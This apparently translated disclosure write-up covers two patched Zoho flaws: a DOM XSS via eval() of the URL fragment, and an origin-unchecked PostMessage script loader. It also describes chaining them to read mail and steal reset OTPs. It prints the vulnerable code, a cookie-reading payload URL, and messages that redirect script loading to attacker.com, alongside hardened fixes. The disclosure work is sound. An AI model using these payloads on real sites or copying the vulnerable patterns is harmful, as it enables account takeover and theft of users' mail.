How a Single Click Can Fully Compromise a Zoho Account: DOM XSS and PostMessage Misconfiguration Explained

A security researcher uncovered two critical Zoho flaws—a DOM‑based XSS on www.zoho.com.cn/assist/videos and a PostMessage configuration error on www.zoho.com—that together enable an attacker to hijack a user’s account with a single malicious link, read emails, capture OTPs, and gain full control.

Written by Black & White Path

Vulnerability Overview

The researcher identified two independent high‑severity issues in Zoho that each allow full account takeover (ATO): a DOM‑based XSS on www.zoho.com.cn and a PostMessage configuration error on www.zoho.com. Either flaw alone can be exploited to hijack a victim’s account.

[Figure: Vulnerability overview diagram]

1. DOM XSS Detail

Discovery

The vulnerable URL https://www.zoho.com.cn/assist/videos/#payload was found during routine security scanning.

Technical Analysis

The page loads JavaScript that extracts the fragment identifier (the part after ‘#’) from the URL and passes it directly to eval(). The relevant snippet is:

// Vulnerable handler as found on the page: the raw fragment is never validated.
$(document).ready(function(e) {
  var tv_id = window.location.href.split('#');   // tv_id[1] is everything after '#'
  if (!tv_id[1] == "") {                          // precedence quirk, but true for any non-empty fragment
    autoplay(tv_id[1]);
  }
});

function autoplay(tar) {
  var target_v = eval(tar);                       // attacker-controlled string executed as JavaScript
  // ...
}

When a victim visits a URL such as

https://www.zoho.com.cn/assist/videos/#alert(document.cookie)

the fragment is evaluated, allowing arbitrary JavaScript execution. This enables cookie theft, page hijacking, and phishing.
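A hardened replacement for the handler above, added here as an example and not Zoho's own code: the fragment is treated as an opaque video id, checked against a strict pattern and a known-video table, and never reaches eval(). The catalogue contents and media paths are constructed for the example.

```javascript
// Constructed sample of a video catalogue keyed by id (assumed structure).
const VIDEO_CATALOGUE = {
  "getting-started": "/assist/videos/getting-started.mp4",
  "remote-support-101": "/assist/videos/remote-support-101.mp4",
};

// Only short, URL-safe identifiers are acceptable as a fragment.
const VIDEO_ID_PATTERN = /^[a-z0-9][a-z0-9-]{0,63}$/;

// Extract the fragment the way the original code did, then validate it.
// Returns the video id, or null when the fragment is missing or unsafe.
function parseVideoId(href) {
  const hashIndex = href.indexOf("#");
  if (hashIndex === -1) return null;
  let fragment = href.slice(hashIndex + 1);
  try {
    fragment = decodeURIComponent(fragment);
  } catch (e) {
    return null; // malformed percent-encoding is rejected outright
  }
  if (!VIDEO_ID_PATTERN.test(fragment)) return null;
  // hasOwnProperty guards against prototype names such as "constructor".
  return Object.prototype.hasOwnProperty.call(VIDEO_CATALOGUE, fragment)
    ? fragment
    : null;
}

// Safe counterpart of autoplay(): resolves the id through the catalogue and
// returns the media URL to assign to a <video> element. No code is executed.
function resolveAutoplay(href) {
  const id = parseVideoId(href);
  return id === null ? null : VIDEO_CATALOGUE[id];
}
```

In the page this would replace the autoplay(tv_id[1]) call, with the returned URL set on the player rather than evaluated.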

Impact

Exploiting the DOM XSS can steal the user’s session cookie, hijack page content, and serve as a stepping stone for further account‑takeover techniques.

2. PostMessage Misconfiguration Detail

Discovery

Analysis of scripts on www.zoho.com revealed an insecure PostMessage handling routine.

Technical Analysis

The page checks for a ps_editor parameter in the URL; if present, it loads an external script scriptLoader.js. Inside that script a message listener is registered:

// Vulnerable listener as found in scriptLoader.js: note the absence of any
// event.origin check before the message is acted upon.
ps_loader.messageListener = function(event) {
  if (event.data.id === "pagesense-scriptloader-message") {
    const eventAction = event.data.action;
    switch (eventAction) {
      case "updateServerDomain": {
        SERVER_DOMAIN = event.data.serverDomain;     // host for later script loads, taken from the message
        break;
      }
      case "loadScript": {
        var scripts = event.data.scripts;
        for (var i = 0; i < scripts.length; i++) {
          ps_loader.loadScript(scripts[i]);          // builds a URL from SERVER_DOMAIN and injects a <script>
        }
        break;
      }
    }
  }
};

window.addEventListener("message", ps_loader.messageListener);

The listener never checks event.origin, so any window that can obtain a reference to the page (an opener or an embedding parent, for example) can send these messages. It blindly accepts the SERVER_DOMAIN value supplied via PostMessage and then loads scripts from that domain, enabling an attacker to inject arbitrary JavaScript.

Exploitation Steps

Send a PostMessage that sets SERVER_DOMAIN to an attacker‑controlled server, e.g.:

{"id":"pagesense-scriptloader-message","action":"updateServerDomain","serverDomain":"attacker.com"}

Send a second PostMessage that instructs the loader to fetch a script, e.g.:

{"id":"pagesense-scriptloader-message","action":"loadScript","scripts":["editor"]}

The page then loads https://attacker.com/pagesense/initializer/editor.js, executing any attacker code.
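A hardened listener modelled on the scriptLoader.js routine, added here as an example and not Zoho's code: it rejects messages whose event.origin is not on an allowlist, refuses to let a message change the server domain at all, and only loads script names from a fixed table. The trusted origins, the fixed domain and the script paths are assumptions.

```javascript
const TRUSTED_ORIGINS = new Set(["https://www.zoho.com"]);        // assumed allowlist
const SERVER_DOMAIN = "pagesense.zoho.com";                         // assumed; fixed at build time
const ALLOWED_SCRIPTS = { editor: "/pagesense/initializer/editor.js" }; // assumed paths
const MESSAGE_ID = "pagesense-scriptloader-message";

// createLoader returns the listener plus logs of what it loaded or rejected,
// so the behaviour can be checked without a browser. In the page you would
// call window.addEventListener("message", loader.messageListener).
function createLoader(loadScript) {
  const loaded = [];
  const rejected = [];
  function messageListener(event) {
    // First gate: the sender's origin, which the browser sets and cannot be forged.
    if (!TRUSTED_ORIGINS.has(event.origin)) {
      rejected.push({ origin: event.origin, reason: "untrusted origin" });
      return;
    }
    const data = event.data;
    if (!data || typeof data !== "object" || data.id !== MESSAGE_ID) return;
    switch (data.action) {
      case "updateServerDomain":
        // Deliberately unsupported: the load domain is never message-controlled.
        rejected.push({ origin: event.origin, reason: "serverDomain is immutable" });
        return;
      case "loadScript": {
        const names = Array.isArray(data.scripts) ? data.scripts : [];
        for (const name of names) {
          if (!Object.prototype.hasOwnProperty.call(ALLOWED_SCRIPTS, name)) {
            rejected.push({ origin: event.origin, reason: "unknown script " + String(name) });
            continue;
          }
          const url = "https://" + SERVER_DOMAIN + ALLOWED_SCRIPTS[name];
          loaded.push(url);
          loadScript(url); // e.g. append a <script src=url> in the browser
        }
        return;
      }
      default:
        return;
    }
  }
  return { messageListener, loaded, rejected };
}
```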

3. Account Takeover Attack Chain

IFRAME Nesting

The workplace.zoho.com page embeds an iframe pointing to mail.zoho.com. The iframe permits parent‑child communication via PostMessage, linking the two vulnerabilities.

CORS Bypass to Read Mail

When Zoho Mail loads, it fetches data from zmXX.zoho.com. The response headers allow cross‑origin requests from www.zoho.com. Combined with the PostMessage flaw, an attacker can read the victim’s email content from the parent page.

OTP Interception

During a password‑reset flow, Zoho sends a one‑time password (OTP) to the user’s email. Because the attacker can read that email, they can capture the OTP and complete the login, achieving full account takeover.

4. Timeline

2024‑01‑16: DOM XSS first reported.

2024‑01‑24: PostMessage issue reported.

2024‑02‑09: DOM XSS patched.

2024‑03‑19: PostMessage issue patched.

2024‑04‑12: Bug bounty awarded ($1,000 for DOM XSS, $100 for PostMessage).

2024‑04‑25: Additional $1,100 reward.

5. Mitigation Recommendations

Apply the latest Zoho updates; the vendor has already patched both flaws.

Never click unverified links, especially those containing a fragment identifier (e.g., #payload).

Enable two‑factor authentication (2FA) to mitigate OTP theft.

Regularly review login activity and revoke unknown sessions promptly.
